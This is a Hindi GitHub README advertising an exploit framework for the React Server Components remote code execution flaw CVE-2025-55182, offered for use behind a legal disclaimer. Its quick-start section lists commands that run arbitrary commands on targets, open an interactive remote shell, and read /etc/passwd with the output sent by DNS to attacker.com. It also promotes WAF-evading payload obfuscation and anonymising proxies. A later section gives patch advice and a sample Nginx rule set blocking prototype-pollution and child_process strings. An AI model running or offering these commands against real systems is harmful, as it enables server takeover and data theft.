
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Updated!
CVE-2025-55182 के लिए उन्नत React Server Components RCE स्कैनर। विशेषताएँ: बहु-चरणीय फ़िंगरप्रिंटिंग, भेद्यता सत्यापन, DNS एक्सफ़िल्ट्रेशन, इंटरैक्टिव शेल, पेलोड ऑब्फ़स्केशन, और पेशेवर रिपोर्टिंग (JSON/HTML/PDF)। केवल अधिकृत परीक्षण।
🔐 ReactRCE-Scanner
CVE-2025-55182 — उन्नत React Server Components RCE एक्सप्लॉइट और मूल्यांकन फ्रेमवर्क
📑 विषय-सूची
⚠️ कानूनी अस्वीकरण और नैतिक सूचना
यह टूल विशेष रूप से शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व लिखित सहमति के बिना लक्ष्यों के विरुद्ध इस सॉफ़्टवेयर का अनधिकृत उपयोग अंतर्राष्ट्रीय कंप्यूटर अपराध कानूनों का उल्लंघन है, जिसमें Computer Fraud and Abuse Act (CFAA), GDPR प्रावधान, और मानक सेवा शर्तें समझौते शामिल हैं। लेखक और योगदानकर्ता इस कार्यक्रम से उत्पन्न किसी भी दुरुपयोग, अवैध संचालन, या परिणामी क्षति के लिए सभी दायित्वों से इनकार करते हैं।पूर्णतः अपने जोखिम पर आगे बढ़ें।
📋 अवलोकन
ReactRCE-Scanner एक एंटरप्राइज़-ग्रेड सुरक्षा मूल्यांकन और सत्यापन फ्रेमवर्क है, जिसे विशेष रूप से CVE-2025-55182 [1] के लिए डिज़ाइन किया गया है, जो एक गंभीर Remote Code Execution (RCE) भेद्यता है जो React Server Components को संस्करण 19.0.0 से 19.2.0 तक प्रभावित करती है।
यह फ्रेमवर्क सैद्धांतिक भेद्यता अनुसंधान और व्यावहारिक सुरक्षा सत्यापन के बीच की खाई को पाटता है। बहु-चरणीय फिंगरप्रिंटिंग, कठोर गलत-सकारात्मक कमी, उन्नत पेलोड ऑब्फस्केशन, और स्वचालित बहु-प्रारूप रिपोर्टिंग को शामिल करके, यह सुरक्षा इंजीनियरों को सटीक नैदानिक क्षमताएँ प्रदान करता है।
| उपयोग | स्कैन परिणाम |
|---|---|
🎯 मुख्य क्षमताएँ
| विशेषता श्रेणी | कार्यान्वयन विशेषता | परिचालन स्थिति |
|---|---|---|
| स्मार्ट फिंगरप्रिंटिंग | विश्वास स्कोरिंग एल्गोरिदम के साथ बहु-स्रोत फ्रेमवर्क और संस्करण पहचान। | ✅ |
| बहु-चरणीय सत्यापन | गलत सकारात्मक को व्यवस्थित रूप से समाप्त करने के लिए डिज़ाइन की गई 5-चरणीय सत्यापन पाइपलाइन। | ✅ |
| पेलोड जनरेशन | DNS एक्सफ़िल्ट्रेशन और बहु-एन्कोडिंग का समर्थन करने वाला ऑब्फस्केटेड पेलोड बिल्डर। | ✅ |
| इंटरैक्टिव शेल | सत्यापित लक्ष्यों पर रीयल-टाइम छद्म-इंटरैक्टिव कमांड निष्पादन और शेल एक्सेस। | ✅ |
| व्यापक रिपोर्टिंग | JSON, HTML, PDF, और Markdown प्रारूपों में स्वचालित रिपोर्ट जनरेशन। | ✅ |
| DNS एक्सफ़िल्ट्रेशन | सुरक्षित DNS क्वेरी हैंडलिंग के माध्यम से आउट-ऑफ-बैंड कमांड आउटपुट एक्सफ़िल्ट्रेशन। | ✅ |
| कंकरेंसी इंजन | बड़े अटैक सरफेस के लिए उच्च-प्रदर्शन मल्टी-थ्रेडेड स्कैनिंग आर्किटेक्चर। | ✅ |
| प्रॉक्सी एकीकरण | अनाम मूल्यांकन ट्रैफ़िक के लिए HTTP/HTTPS और SOCKS प्रॉक्सी समर्थन। | ✅ |
🚀 त्वरित प्रारंभ मार्गदर्शिका
इंस्टॉलेशन
रिपॉज़िटरी को क्लोन करें और स्वचालित सेटअप स्क्रिप्ट या मैन्युअल निर्भरता इंस्टॉलेशन का उपयोग करके वातावरण को प्रारंभ करें:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
बुनियादी कमांड संदर्भ
यह फ्रेमवर्क एक मॉड्यूलर CLI आर्किटेक्चर के माध्यम से संचालित होता है जो एकल-लक्ष्य सत्यापन, फ़ाइल सूचियों से बल्क स्कैनिंग, इंटरैक्टिव शेल स्पॉनिंग, और अनुपालन रिपोर्टिंग का समर्थन करता है।
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
🔬 आर्किटेक्चर और विशेषताओं की गहन जानकारी
1. स्मार्ट फिंगरप्रिंटिंग इंजन
यह फ्रेमवर्क पेलोड डिलीवरी से पहले गहन टोह लेता है। यह कई HTTP हेडर फ़ील्ड (X-Powered-By, Next-Action, RSC), HTML संरचनात्मक मेटा टैग (data-reactroot, __NEXT_DATA__), स्थिर बिल्ड एसेट्स, और JavaScript स्रोत बंडलों [2] [3] का विश्लेषण करता है।
विश्वास स्कोर चार श्रेणियों में वर्गीकृत हैं:
-
CRITICAL (95%+): कई स्वतंत्र संकेतक भेद्य React Server Component रनटाइम संस्करणों की पुष्टि करते हैं।
-
HIGH (75–95%): सटीक संस्करण मिलान के साथ मजबूत संरचनात्मक संकेतक पहचाने गए।
-
MEDIUM (50–75%): आंशिक फ्रेमवर्क मार्कर मौजूद; मैन्युअल सत्यापन आवश्यक।
-
LOW (<50%): कमजोर ह्यूरिस्टिक्स का पता चला; गलत सकारात्मक की उच्च संभावना।
2. बहु-चरणीय सत्यापन वर्कफ़्लो
परिचालन अखंडता बनाए रखने और अनपेक्षित सेवा व्यवधानों को रोकने के लिए, किसी भी शोषण चरण को अनलॉक करने से पहले पेलोड एक कठोर सत्यापन पाइपलाइन से गुज़रते हैं।
Target URL / Endpoint
│
▼
[Stage 1] Framework & Header Detection
│
▼
[Stage 2] Component Version Analysis
│
▼
[Stage 3] Protocol Compatibility Check
│
▼
[Stage 4] Non-Destructive Safe Validation Request
│
▼
[Stage 5] Statistical Confidence Scoring
│
▼
Vulnerability Assessment Decision
3. पेलोड ऑब्फस्केशन और एवेज़न
रक्षात्मक नियंत्रणों और Web Application Firewalls (WAFs) का परीक्षण करने के लिए, यह फ्रेमवर्क एक उन्नत पेलोड जनरेटर एम्बेड करता है जो समर्थन करता है:
-
एन्कोडिंग स्कीम: Base64, Hexadecimal, और Octal रूपांतरण।
-
संरचनात्मक ऑब्फस्केशन: डायनामिक स्ट्रिंग स्प्लिटिंग, जंक कोड इंजेक्शन, और वैकल्पिक
requireमेथड मैपिंग। -
आउट-ऑफ-बैंड (OOB) एक्सफ़िल्ट्रेशन: जब सीधे प्रतिक्रिया चैनल प्रतिबंधित हों तो DNS क्वेरीज़ के माध्यम से सुरक्षित डेटा टनलिंग।
4. इंटरैक्टिव कमांड शेल
सफल सत्र स्थापना के बाद, ऑपरेटर सत्यापन-पश्चात गणना के लिए एक इंटरैक्टिव शेल वातावरण शुरू कर सकते हैं।
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.
shell> whoami
www-data
shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux
shell> exit
[*] Terminating session and cleaning up temporary artifacts...
5. व्यावसायिक रिपोर्टिंग सूट
रिपोर्टें कई मानकीकृत प्रारूपों (JSON, HTML, PDF, Markdown) में उत्पन्न की जा सकती हैं जिनमें कार्यकारी सारांश, जोखिम मेट्रिक्स, विस्तृत तकनीकी निष्कर्ष, साक्ष्य टाइमलाइन, और CVSS v3.1 स्कोरिंग विवरण [4] शामिल हैं।
⚙️ कॉन्फ़िगरेशन संदर्भ
उन्नत पैरामीटर config.yaml कॉन्फ़िगरेशन फ़ाइल के माध्यम से प्रबंधित किए जाते हैं। नीचे एक प्रोडक्शन कॉन्फ़िगरेशन टेम्पलेट है:
# ReactRCE-Scanner Production Configuration
timeout: 30
threads: 20
max_retries: 3
proxy: null
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
headers:
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate, br"
output:
format: "json"
directory: "./reports"
logging:
level: "INFO"
file: "exploit.log"
exploit:
obfuscate: true
encoding: "base64"
timeout: 60
scanning:
concurrent_scans: 20
rate_limit: 0.5
timeout: 30
fingerprint:
enable_deep_analysis: true
follow_redirects: true
analyze_assets: true
कस्टम कॉन्फ़िगरेशन फ़ाइल का संदर्भ देते हुए स्कैन निष्पादित करें:
python exploit.py -f targets.txt -C config.yaml -o report.json
🧪 स्वचालित परीक्षण सूट
रिपॉज़िटरी में रिलीज़ के दौरान मॉड्यूल स्थिरता सुनिश्चित करने के लिए एक व्यापक यूनिट और इंटीग्रेशन परीक्षण सूट शामिल है।
# Execute the complete automated test suite
python exploit.py --test
# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed
Tests passed: 5/5
स्थानीय विकास वातावरण स्थापित करने वाले योगदानकर्ताओं के लिए:
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt
# Run pytest unit tests
pytest tests/
# Format and lint codebase
black exploit.py
flake8 exploit.py
🛡️ उपचार और शमन
तत्काल प्रशासनिक कार्रवाई
-
पैचिंग: React पैकेजों को तुरंत संस्करण
19.2.1या उच्चतर में अपग्रेड करें। Next.js इंस्टेंस को संस्करण15.0.4+में अपडेट करें [5]। -
निगरानी: संदिग्ध
Next-Actionहेडर मानों और अमान्य प्रोटोटाइप संदर्भों (__proto__,constructor) के लिए HTTP एक्सेस लॉग की जाँच करें [6]। -
नेटवर्क हार्डनिंग: डेटा एक्सफ़िल्ट्रेशन को रोकने के लिए एप्लिकेशन सर्वर से आउटबाउंड रिकर्सिव DNS क्वेरीज़ को प्रतिबंधित करें।
संदर्भ WAF नियम (Nginx / OpenResty)
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
return 403;
}
if ($request_body ~* "constructor") {
return 403;
}
if ($request_body ~* "child_process") {
return 403;
}
if ($request_body ~* "execSync") {
return 403;
}
📚 संदर्भ
🤝 योगदान और समुदाय
योगदान, फ़ीचर अनुरोध, और बग रिपोर्ट का स्वागत है। कृपया मानक fork-and-pull request वर्कफ़्लो का पालन करें:
-
रिपॉज़िटरी को फ़ोर्क करें (
https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork) -
अपनी फ़ीचर ब्रांच बनाएँ (
git checkout -b feature/AdvancedScannerModule) -
अपने परिवर्तन कमिट करें (
git commit -m 'Add advanced scanning heuristic') -
ब्रांच पर पुश करें (
git origin push feature/AdvancedScannerModule) -
एक Pull Request खोलें
📜 लाइसेंस और लेखक
MIT License के अंतर्गत वितरित। अधिक जानकारी के लिए LICENSE देखें।
CerberusMrXi द्वारा सटीकता के साथ निर्मित अंतिम अपडेट: अगस्त 2026